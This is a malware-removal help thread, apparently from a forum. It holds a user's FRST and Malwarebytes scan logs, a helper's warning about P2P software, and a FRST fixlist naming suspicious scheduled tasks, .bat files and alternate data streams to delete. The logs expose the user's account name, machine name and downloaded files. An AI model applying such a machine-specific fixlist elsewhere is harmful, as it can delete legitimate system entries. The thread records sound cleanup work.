CHR Extension: (Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-08-15]
CHR Extension: (Inbox by Gmail) - C:\Users\RoNiN\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkclgpgponpjmpfokoepglboejdobkpl [2015-11-12]
CHR HKLM-x32\...\Chrome\Extension: [gihfmmedoddijgnhkgfgnkeohkpbipol] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-04-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S4 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 chromoting; C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe [69016 2016-03-08] (Google Inc.)
S4 CLDTVHNService; C:\Program Files (x86)\DirecTV\DirecTV\Kernel\DMP\CLDTVHNService.exe [75048 2009-09-17] ()
S4 ETDService; C:\Program Files\Elantech\ETDService.exe [144104 2015-10-31] (ELAN Microelectronics Corp.)
R2 Fabs; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\FABS.exe [1253376 2009-08-27] (MAGIX AG) [File not signed]
S4 FirebirdServerMAGIXInstance; C:\Program Files (x86)\Common Files\MAGIX Services\Database\bin\fbserver.exe [3276800 2008-08-07] (MAGIX®) [File not signed]
S4 McciCMService; C:\Program Files (x86)\Common Files\Motive\McciCMService.exe [319488 2010-11-08] (Alcatel-Lucent) [File not signed]
S4 McciCMService64; C:\Program Files\Common Files\Motive\McciCMService.exe [517632 2010-11-08] (Alcatel-Lucent) [File not signed]
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7Debug\mdm.exe [270336 2001-02-23] (Microsoft Corporation) [File not signed]
R2 Micro Star SCM; C:\Program Files (x86)\System Control Manager\MSIService.exe [160768 2009-07-09] (Micro-Star International Co., Ltd.) [File not signed]
S4 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720608 2014-07-25] (NVIDIA Corporation)
S4 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18956064 2014-07-25] (NVIDIA Corporation)
R2 pgsql-8.3; C:\Program Files (x86)\PostgreSQL\8.3\bin\pg_ctl.exe [65536 2008-09-19] (PostgreSQL Global Development Group) [File not signed]
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-04-16] ()
S4 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [745224 2015-07-08] (DEVGURU Co., LTD.)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [5436176 2015-02-09] (TeamViewer GmbH)
R2 tmInstall; C:\Program Files\Thrustmaster\FFB Racing wheel\drivers\amd64\tmInstall.EXE [50336 2015-09-15] (Thrustmaster®)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AnyDVD; C:\Windows\System32\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 AnyDVD; C:\Windows\SysWOW64\Drivers\AnyDVD.sys [125512 2010-12-01] (SlySoft, Inc.)
R3 ArcSoftKsUFilter; C:\Windows\System32\DRIVERS\ArcSoftKsUFilter.sys [19968 2009-05-26] (ArcSoft, Inc.)
S3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [165376 2015-07-09] (Microsoft Corporation)
S3 BthHFAud; C:\Windows\system32\DRIVERS\BthHfAud.sys [36864 2015-07-09] (Microsoft Corporation)
S3 EUCR; C:\Windows\System32\drivers\EUCR6SK.SYS [87888 2009-12-04] (ENE Technology Inc.)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2010-11-08] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 NTIOLib_1_0_4; C:\Program Files (x86)\msi\Live Update 5\NTIOLib_X64.sys [14136 2010-10-22] (MSI)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20256 2014-07-25] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-06-17] (Realtek                                            )
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2011-02-14] (Duplex Secure Ltd.)
S3 tmbulk; C:\Windows\System32\Drivers\tmbulk.sys [133280 2015-06-30] (© Guillemot R&D, 2015. All rights reserved.)
S3 tmhidusb; C:\Windows\system32\DRIVERS\tmhidusb.sys [170144 2015-09-15] (Thrustmaster)
S3 tmResetMin; C:\Windows\System32\Drivers\tmResetMin.sys [36000 2015-09-15] (© Guillemot R&D, 2013. All rights reserved.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-09] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 MFE_RR; \??\C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-14 18:37 - 2016-04-14 18:37 - 00016148 _____ C:\WINDOWS\system32\RONIN-LAPTOP_RoNiN_HistoryPrediction.bin
2016-04-10 19:08 - 2016-04-10 19:14 - 98655550 _____ C:\Users\RoNiN\Downloads\ECOMM - Brian Laney - Alert Technologies.pdf
2016-04-09 10:36 - 2016-04-09 10:36 - 00002547 _____ C:\Users\Public\Desktop\TurboTax 2015.lnk
2016-04-09 10:36 - 2016-04-09 10:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2015
2016-04-09 01:20 - 2016-04-09 01:22 - 00000000 ____D C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko)
2016-04-09 00:24 - 2016-04-09 00:31 - 39492246 _____ C:\Users\RoNiN\Downloads\Cypress Hill - Cypress X Rusko EP (With Rusko).zip
2016-04-09 00:02 - 2016-04-09 00:15 - 00000000 ____D C:\Users\RoNiN\Downloads\Weezer - Weezer (White Album)
2016-04-09 00:02 - 2016-04-09 00:12 - 00000000 ____D C:\Users\RoNiN\Downloads\A Tribe Called Quest - The Best Of
2016-04-08 23:28 - 2016-04-08 23:28 - 03119168 _____ C:\Users\RoNiN\Downloads\AdwCleaner.exe
2016-04-08 10:20 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\system32\gpedit.msc
2016-04-08 09:56 - 2016-04-08 09:56 - 00707354 _____ C:\WINDOWS\unins000.exe
2016-04-08 09:56 - 2016-04-08 09:56 - 00001535 _____ C:\WINDOWS\unins000.dat
2016-04-08 09:56 - 2016-04-08 09:56 - 00000000 ____D C:\WINDOWS\SysWOW64\GPBAK
2016-04-08 09:56 - 2008-04-14 02:11 - 00295936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appmgr.dll
2016-04-08 09:56 - 2001-08-23 13:00 - 00034871 _____ C:\WINDOWS\SysWOW64\gpedit.msc
2016-04-07 20:55 - 2016-04-14 18:38 - 00000000 ____D C:\FRST
2016-04-07 18:06 - 2016-04-07 18:08 - 00271216 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_18.06.48_log.txt
2016-04-07 16:15 - 2016-04-09 16:19 - 00000000 ____D C:\AdwCleaner
2016-04-07 15:48 - 2016-04-07 15:48 - 00000490 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.48.47_log.txt
2016-04-07 15:05 - 2016-04-07 15:08 - 00270622 _____ C:\TDSSKiller.3.1.0.9_07.04.2016_15.05.40_log.txt
2016-04-05 13:10 - 2016-04-13 20:28 - 00000000 ____D C:\virus
2016-03-29 18:40 - 2016-03-29 18:40 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (10).ica
2016-03-29 18:29 - 2016-03-29 18:29 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (9).ica
2016-03-29 18:21 - 2016-03-29 18:21 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (8).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001380 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (5).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (7).ica
2016-03-29 18:20 - 2016-03-29 18:20 - 00001379 _____ C:\Users\RoNiN\Downloads\,DanaInfo=.avjtwyfrijk8Knrrqq-zSw98+Q29udHJvbGxlci5CQkJZX1hENzZfUFZTX1Bvb2xlZF9TdGF0aWMgJFM1LTE- (6).ica
2016-03-29 18:12 - 2016-03-29 18:19 - 59554128 _____ (Citrix Systems, Inc.) C:\Users\RoNiN\Downloads\CitrixReceiver4.2.100 (1).exe
2016-03-29 18:11 - 2016-03-29 18:22 - 00734784 _____ (Oracle Corporation) C:\Users\RoNiN\Downloads\JavaSetup8u77.exe
2016-03-29 18:10 - 2016-03-29 18:10 - 02072960 _____ (Pulse Secure, LLC) C:\Users\RoNiN\Downloads\JuniperSetupClientInstaller.exe
2016-03-24 00:01 - 2016-03-24 00:01 - 04622232 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool (1).exe
2016-03-23 23:06 - 2016-04-11 19:17 - 00002282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-03-23 23:06 - 2016-04-11 19:17 - 00002270 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-03-23 23:04 - 2016-03-23 23:05 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup (1).exe
2016-03-23 22:36 - 2016-03-23 22:45 - 04584344 _____ (Google) C:\Users\RoNiN\Downloads\chrome_cleanup_tool.exe
2016-03-23 22:26 - 2016-03-23 22:26 - 00987728 _____ (Google Inc.) C:\Users\RoNiN\Downloads\ChromeSetup.exe
2016-03-23 07:41 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\is-BFNHB.tmp
2016-03-22 23:30 - 2016-03-22 23:30 - 00000000 ____D C:\ProgramData\Emsisoft
2016-03-22 21:58 - 2016-04-09 18:44 - 00000000 ____D C:\Program Files\Emsisoft Anti-Malware
2016-03-22 21:04 - 2016-03-22 21:04 - 00000020 ___SH C:\Users\postgres\ntuser.ini
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\My Documents
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Videos
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Pictures
2016-03-22 21:04 - 2016-03-22 21:04 - 00000000 _SHDL C:\Users\postgres\Documents\My Music
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Real
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Roaming\Media Center Programs
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA Corporation
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\NVIDIA
2016-03-22 21:02 - 2015-10-03 04:51 - 00000000 ____D C:\Users\postgres\AppData\Local\Google
2016-03-22 21:01 - 2016-04-12 20:45 - 00000000 ____D C:\Users\postgres
2016-03-22 08:01 - 2016-04-08 13:17 - 00003650 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-03-21 23:37 - 2016-03-29 12:30 - 00000000 ____D C:\WINDOWS\Microsoft Antimalware
2016-03-21 23:03 - 2016-03-21 23:03 - 00001066 _____ C:\malwarebytes scan 2016-03-21.txt
2016-03-21 19:35 - 2016-03-21 19:35 - 00000046 _____ C:\Users\RoNiN\AppData\Roaming\WB.CFG
2016-03-21 19:12 - 2016-03-21 10:23 - 00886256 _____ (Microsoft Corporation) C:\Users\RoNiN\Desktop\mssstool64.exe
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-04-14 18:38 - 2011-02-19 00:22 - 00000928 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-04-14 18:36 - 2015-10-03 04:40 - 00000000 ____D C:\Users\RoNiN
2016-04-14 18:36 - 2015-07-30 18:40 - 00000000 ____D C:\WINDOWS\INF
2016-04-14 18:35 - 2015-07-30 17:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-04-14 18:10 - 2014-05-10 00:37 - 00000934 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job
2016-04-14 18:07 - 2014-05-26 01:05 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-04-14 18:03 - 2011-02-19 00:22 - 00000932 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-04-14 16:10 - 2014-05-10 00:37 - 00000882 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job
2016-04-13 20:35 - 2015-07-10 05:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2016-04-13 20:23 - 2011-08-23 00:51 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Temp
2016-04-13 20:21 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2016-04-13 18:42 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-04-13 15:43 - 2015-07-30 18:42 - 00000000 ___HD C:\Program Files\WindowsApps
2016-04-12 17:52 - 2015-10-03 08:42 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Packages
2016-04-09 18:40 - 2014-01-05 20:04 - 00000000 ____D C:\Users\RoNiN\Desktop\XBOX1
2016-04-09 16:28 - 2015-10-03 04:36 - 00006876 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-04-09 14:33 - 2016-03-13 14:29 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-04-09 12:44 - 2010-10-17 10:09 - 00000000 ____D C:\Users\RoNiN\Documents\Text Documents
2016-04-09 11:12 - 2010-10-16 20:42 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\Intuit
2016-04-09 10:39 - 2012-02-07 03:14 - 00001545 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2016-04-09 10:33 - 2011-02-15 01:43 - 00000000 ____D C:\Program Files (x86)\TurboTax
2016-04-09 01:22 - 2010-10-17 17:13 - 00000000 ____D C:\Program Files (x86)\The GodFather
2016-04-09 00:04 - 2011-02-19 00:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-04-08 15:53 - 2009-07-13 23:20 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2016-04-08 13:45 - 2015-07-30 18:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-04-07 16:20 - 2011-07-10 23:21 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Yahoo!
2016-04-07 14:52 - 2013-11-10 15:02 - 04126550 _____ C:\WINDOWS\ntbtlog.txt
2016-04-07 14:36 - 2015-07-30 18:42 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-03-29 18:38 - 2013-12-17 08:09 - 00000000 ____D C:\ProgramData\Oracle
2016-03-29 18:37 - 2015-03-13 11:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-03-29 18:37 - 2010-10-17 17:05 - 00000000 ____D C:\Program Files (x86)\Java
2016-03-29 18:33 - 2015-09-29 09:12 - 00000000 ____D C:\Users\RoNiN\.oracle_jre_usage
2016-03-29 18:32 - 2015-03-13 11:04 - 00097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2016-03-25 15:28 - 2015-07-30 17:50 - 00000000 ____D C:\WINDOWS\Setup
2016-03-25 15:00 - 2016-03-11 19:33 - 00000000 ____D C:\Users\RoNiN\AppData\LocalLow\Company
2016-03-25 14:59 - 2015-07-12 09:18 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707123-0500-0006-000700080009
2016-03-25 14:59 - 2015-07-12 09:17 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436707069-0500-0006-000700080009
2016-03-24 00:32 - 2013-07-11 06:09 - 00000000 ____D C:\Users\RoNiN\Update
2016-03-23 16:05 - 2016-03-11 19:27 - 00000000 ____D C:\ProgramData\DataFile
2016-03-22 23:42 - 2015-07-12 09:38 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\03000200-1436708320-0500-0006-000700080009
2016-03-22 20:01 - 2015-10-01 18:30 - 00003582 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 20:01 - 2015-10-01 18:30 - 00003518 _____ C:\WINDOWS\System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001
2016-03-22 01:44 - 2016-03-11 19:36 - 00000000 ____D C:\Users\RoNiN\AppData\Local\app
2016-03-21 20:44 - 2016-03-13 19:23 - 00000000 ____D C:\Users\RoNiN\AppData\Local\Setup Wizard
2016-03-21 20:42 - 2015-09-27 14:51 - 00000000 ____D C:\Users\RoNiN\AppData\Roaming\foobar2000
2016-03-21 20:41 - 2015-09-27 14:49 - 03875496 _____ (foobar2000.org) C:\Users\RoNiN\Downloads\foobar2000_v1.3.8.exe
 
==================== Files in the root of some directories =======
 
2016-03-11 19:39 - 2016-03-11 19:39 - 7600640 _____ () C:\Users\RoNiN\AppData\Roaming\agent.dat
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Ambient
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Mono
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\Users\RoNiN\AppData\Roaming\Analog Pad
2015-10-29 09:35 - 2015-10-29 09:35 - 0000093 _____ () C:\Users\RoNiN\AppData\Roaming\ARCompanion.log
2016-03-11 19:38 - 2016-03-11 19:38 - 0072729 _____ () C:\Users\RoNiN\AppData\Roaming\Dripsoling.tst
2015-04-19 08:20 - 2015-04-19 08:20 - 0005872 _____ () C:\Users\RoNiN\AppData\Roaming\GWB6hPAk0e6t
2016-03-11 19:32 - 2016-03-11 19:32 - 0127488 _____ () C:\Users\RoNiN\AppData\Roaming\Installer.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 0018432 _____ () C:\Users\RoNiN\AppData\Roaming\Main.dat
2016-03-11 19:39 - 2016-03-11 19:39 - 1786944 _____ () C:\Users\RoNiN\AppData\Roaming\Silflex.tst
2016-03-21 19:35 - 2016-03-21 19:35 - 0000046 _____ () C:\Users\RoNiN\AppData\Roaming\WB.CFG
2011-03-09 00:31 - 2012-12-28 02:36 - 0004608 _____ () C:\Users\RoNiN\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-09-04 17:15 - 2011-09-04 18:54 - 0044224 _____ () C:\Users\RoNiN\AppData\Local\RAContactHistory.xml
2014-01-13 08:41 - 2015-05-10 15:55 - 0007599 _____ () C:\Users\RoNiN\AppData\Local\Resmon.ResmonCfg
2016-03-09 18:03 - 2016-03-09 18:03 - 0002560 _____ () C:\Users\RoNiN\AppData\Local\uninstall.exe
2012-11-05 05:50 - 2012-11-05 05:50 - 0000026 ____H () C:\ProgramData\.811261211181235583101118113995
2010-12-13 23:04 - 2011-03-23 01:59 - 0000083 ___SH () C:\ProgramData\.zreglib
2012-05-27 21:35 - 2012-05-27 21:35 - 0000057 _____ () C:\ProgramData\Ament.ini
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Analog Sync
2014-02-13 05:54 - 2014-02-13 05:54 - 0000268 ___RH () C:\ProgramData\Animals
2014-02-13 05:53 - 2014-02-13 05:53 - 0000268 ___RH () C:\ProgramData\Applause and Laugher
2010-10-17 21:03 - 2010-10-17 21:03 - 0004998 _____ () C:\ProgramData\bltofzsb.qlf
2015-03-01 21:31 - 2015-03-01 21:31 - 0004939 _____ () C:\ProgramData\flwjycbm.bab
2012-02-07 03:14 - 2016-04-09 10:39 - 0001545 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2014-02-13 05:54 - 2014-02-13 05:54 - 0000020 ____H () C:\ProgramData\PKP_DLes.DAT
2014-02-13 05:53 - 2015-06-25 13:12 - 0000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-02-13 05:53 - 2015-09-27 23:45 - 0000020 ____H () C:\ProgramData\PKP_DLev.DAT
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-04-08 10:02
 
==================== End of FRST.txt ============================

 

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2016.04.14.07
  rootkit: v2016.04.09.01
 
Windows 10 x64 NTFS
Internet Explorer 11.0.10240.16724
RoNiN :: RONIN-LAPTOP [administrator]
 
4/14/2016 7:08:08 PM
mbar-log-2016-04-14 (19-08-08).txt
 
Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled: 
Objects scanned: 444913
Time elapsed: 1 hour(s), 27 minute(s), 59 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)

#10 Jo*

Jo*

  • Malware Response Team
  • 3,445 posts
  • OFFLINE
    •  
  • Gender:Male
  • Location:Germany
  • Local time:02:32 PM

Posted 15 April 2016 - 04:15 AM

Going over your logs I noticed that you have p2p program BitTorrent installed.
  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and Trojans spread across P2P file sharing networks, gaming and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, Trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.
It is pretty much certain that if you continue to use P2P programs, you will get infected again.
I would recommend that you uninstall p2p program BitTorrent, however that choice is up to you. If you choose to remove these programs, you can do so via Start > Control Panel > Add/Remove Programs.
If you wish to keep it, please do not use it until your computer is cleaned.

---

:step1: Open notepad. Please copy the contents of the code box below. To do this highlight the contents of the box and right click on it. Paste this into the open notepad.
Save it in the same location as / FSRT / FSRT64 (usually your desktop) as fixlist.txt
 
start
CreateRestorePoint:
CloseProcesses:
S3 MFE_RR; \??\C:\Users\RoNiN\AppData\Local\Temp\mfe_rr.sys [X]
2016-03-11 19:25 - 2016-04-09 16:22 - 00000368 ____H C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job 
2016-03-11 19:25 - 2016-04-09 16:22 - 00000356 _____ C:\WINDOWS\Tasks\BJZJKCUBLH1.job 
2016-03-11 19:25 - 2016-03-11 19:25 - 00003444 _____ C:\WINDOWS\System32\Tasks\WMMAWVKOLXONAOYC 
2016-03-11 19:25 - 2016-03-11 19:25 - 00002928 _____ C:\WINDOWS\System32\Tasks\BJZJKCUBLH1
Task: {369CA7CD-5C89-4F7B-834D-8F15564BB1DC} - System32\Tasks\Rocfokt => C:\PROGRA~1\SHOPPE~1\Balditii.bat 
C:\PROGRA~1\SHOPPE~1
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151] 
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0] 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{0F22A205-CFB0-4679-8499-A6F44A80A208}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{78550997-5DEF-4A8A-BAF9-D5774E87AC98}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.28.13\psuser_64.dll => No File 
CustomCLSID: HKU\S-1-5-21-470165136-1162808608-978993673-1001_Classes\CLSID\{90B3DFBF-AF6A-4EA0-8899-F332194690F8}\InprocServer32 -> C:\Users\RoNiN\AppData\Local\Google\Update\1.3.24.15\psuser_64.dll => No File 
